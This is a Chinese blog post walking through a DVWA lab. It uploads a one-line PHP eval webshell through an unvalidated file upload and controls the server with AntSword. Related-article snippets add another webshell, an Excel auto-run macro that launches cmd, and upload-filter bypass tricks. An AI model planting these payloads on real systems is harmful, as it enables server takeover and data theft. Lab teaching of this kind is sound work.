一句话木马的使用

最新推荐文章于 2024-05-05 23:47:15 发布
最新推荐文章于 2024-05-05 23:47:15 发布
阅读量2.1k 收藏 14
点赞数 2
分类专栏: web 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50688050/article/details/116353509
版权

实验准备
首先保存一个一句话木马文件Untitled-1.php

<?php @eval($_POST['pass']);?>

DVWA平台
中国蚁剑

实验步骤

  1. 首先进入DVWA平台,选择LOW安全级别
    在这里插入图片描述

  2. 在low安全级别中,网站未对上传的文件进行任何验证所以可以直接上传PHP或ASP一句话木马(可通过右下角的view source查看后台源代码)
    在这里插入图片描述

  3. 将木马文件上传,可以观察到回显的路径,并且查看网站资源可可以看到文件已经被成功上传了
    在这里插入图片描述在这里插入图片描述

  4. 使用中国蚁剑连接,右击添加数据
    连接的密码其实就是一句话木马的内容连接时的密码其实就是一句话木马的内容

  5. 成功连接
    在这里插入图片描述

  6. 保存
    在这里插入图片描述

  7. 双击打开可以看到整个网站的结构和文件,甚至还暴露的电脑的所有文件(主机已经彻底沦陷)
    在这里插入图片描述

鲨鱼辣椒k
关注
  • 2
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python+php一句话木马的利用
CYLK1987310466的博客
07-29 1318
python知识点,php一句话木马
一句话木马”入侵
08-18 1603
实例一:“一句话木马”入侵“EASYNEWS新闻管理系统”    “EASYNEWS新闻管理系统 v1.01 正式版”是在企业网站中非常常见的一套整站模版,在该网站系统的留言本组件中就存在着数据过滤不严漏洞,如果网站是默认路径和默认文件名安装的话,入侵者可以利用该漏洞直接上传ASP木马程序控制整个网站服务器。 Step1 搜索入侵目标     使用了“EASYNEWS新闻管理系统 v1
2024年最全网络安全-一句话木马(1),顺利拿到offer
2301_79985178的博客
05-05 360
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。
PHP一句话木马使用技巧
shy的博客
01-20 1万+
近来发现好多网站有安全狗,会拦截菜刀和蚁剑,因此总结下通过浏览器直接调用一句话木马的姿势。 PHP一句话:<?php @eval($_POST['shy']);?> firefox浏览器:hackbar 命令提示符:curl 首先上传一句话木马到网站目录,可以是虚拟机也可以是VPS,我这里用的是阿里云我自己搭建的网站, 由于只是简单的一句话木马,因次一上车就收到了安全云的短信...
Web安全-一句话木马
热门推荐
道阻且长,行则将至。
05-08 31万+
在很多的渗透过程中,渗透人员会上传一句话木马到目标web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢?
PHP一句话木马
Code-5的博客
04-17 1728
4. 上图中显示sql出错了,但是没有关系,我们可以在文件中看到attack.txt已经生成了。WebShell 是一种在 Web 服务器上运行的脚本或程序,可用于远程控制和管理服务器。保护 Web 服务器的安全对于确保网站和用户数据的安全至关重要。3. 利用文件导入的方式进行注入。
一句话木马要点和防范注意事项
05-24
"一句话木马",顾名思义,是指利用简短的代码实现的恶意程序,它通常隐藏在网页、脚本或者其他可执行文件中,通过Web服务的漏洞进行植入,以达到远程控制或非法获取服务器权限的目的。这类木马因为其简洁高效的特点...
一句话 asp木马加密版 彻底突破杀毒软件
01-02
不知道怎样表达清楚。看例子吧: 代码如下:[removed] Execute(HextoStr(“65786563757465287265717565737428636872283335292929”)) Function HextoStr(data) HextoStr=”EXECUTE “”””” C=”&CHR(&H” N...
php一句话cmdshell新型 (非一句话木马)
10-30
PHP 一句话 CMDShell 新型(非一句话木马)】 在 PHP 开发中,存在一种安全漏洞,称为“一句话 CMDShell”,它允许攻击者通过在 PHP 脚本中注入命令来执行系统级别的操作。虽然通常的一句话木马是直接执行 PHP ...
基于 python 实现的千倍速一句话木马密码爆破工具
最新发布
07-05
一句话木马 【作品名称】:基于 python 实现的千倍速一句话木马密码爆破工具 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目...
一句话木马上传常见的几种方法
YidaHu的博客
01-06 3万+
1,利用00截断,brupsuite上传利用00截断就是利用程序员在写程序时对文件的上传路径过滤不严格,产生0X00上传截断漏洞。 假设文件的上传路径为http://xx.xx.xx.xx/upfiles/lubr.php.jpg ,通过Burpsuite抓包截断将lubr.php后面的“.”换成“0X00”。在上传的时候,当文件系统读到”0X00″时,会认为文件已经结束,从而将lubr.php.
一句话木马、sql注入、蚁剑的安装及使用
veinard_F的博客
05-20 4222
一、基本原理 sql注入主要目标是 Web 应用的后台数据库,从数据库中获取信息和授予较高的权限。它先破坏数据库,再对数据库服务器进行破坏。 sql的概述 浏览网站 发送一个请求SQL语言指令返回数据或执行结果通过web包装后的数据用户web服务端数据库系统 基本类型: 数字型和字符型的注入; 报错型SQL注入; 布尔/时间的SQL注入; 可联合查询的SQL注入; 判断注入类型: 1、数字型注入:id=1 and 1=2,若回显不正常则为数字型注入 2、字符型注入:上述测试若回显正常则为字符型注入 3、报错
你真的了解一句话木马吗?
Elite的博客
04-14 1万+
一句话木马是大多网安人在初步学习中,遇到的一种简单的木马文件,但是你真的了解它吗?
上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)
m0_59598029的博客
03-16 698
复制此路径,在菜刀中右键——添加——粘贴到地址栏——后面栏输入密码x——脚本类型选php——编码选gb2312——添加。将文件名修改为10.php,上传文件类型仍然是image/jpeg,可绕过上传过滤。可对图片文件添加一句话木马,再修改为.php上传,会解析为图片上传此文件。再右键此站点,选择要执行的命令——选文件管理,可操作此服务器上所有文件。即:http://ip/hackable/uploads/10.php。可以修改php文件后缀为其他,再上传。小马:文件体积小、上传文件、文件修改、文件管理。
一句话木马新方法
收集盒 Book box
07-02 557
很多时候我们可以通过在注册表单或者用户信息修改表单中,插入简短的ASP代码。 使网站ASP数据库变成为一个ASP木马,然后进一步入侵控制服务器。 不过在上传代码过程中,许多网页程序都不允许包含〈%%〉标记符号的内容的文件上传。 这样就有好多SHELL不能上传上去了。可以采用下面的方法解决。以蓝屏最小ASP木马为例。 首先:原程序代码是“〈%execute request(“
一句话木马针对的不同框架使用
weixin_43977912的博客
02-07 832
小马和大马都是网页类型中的一种后门,是通过用来控制网站权限的,那最主要的区别就是小马是用来上传大马的。小马体积小,有比大马更强的隐蔽优势,而且有针对文件大小上传限制的漏洞,所以才有小马,小马也通常用来做留备用后门等 大马:辅助提权、执行sql语句、反弹shell、添加后门 webshell根据脚本可以分为PHP脚本木马,ASP脚本木马,也有基于.NET的脚本木马和JSP脚本木马。在国外,还有用python脚本语言写的动态网页,当然也有与之相关的webshell。 webshell根据功能也分为大马、小马和一
攻防世界 仪剑 一句话木马
ANYOUZHEN的博客
10-30 1510
打开蚁剑,然后我们输入ip地址和shell,如下 加载数据,点击 cyberpeace{94905b812abda5121eda8ecbbdccaf5f}
excel一句话木马
01-26
Excel一句话木马是一种利用Excel文件进行攻击的恶意软件。它通过在Excel文件中嵌入恶意宏代码来实现攻击目标。当用户打开包含恶意宏代码的Excel文件时,该代码会在用户的计算机上执行,并可能导致系统被入侵或数据被窃取。 以下是一个示例,展示了如何在Excel中创建一句话木马: ```vba Sub Auto_Open() Dim shell As Object Set shell = CreateObject("WScript.Shell") shell.Run "cmd.exe /c your_malicious_command", 0 End Sub ``` 在上述示例中,恶意宏代码使用`WScript.Shell`对象创建一个命令行窗口,并执行`your_malicious_command`命令。这个命令可以是任何你想要在受害者计算机上执行的恶意操作。 请注意,使用恶意宏代码进行攻击是非法的,并且可能导致法律责任。为了保护自己的计算机安全,建议不要打开来自不信任来源的Excel文件,并确保你的计算机有最新的安全补丁和防病毒软件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值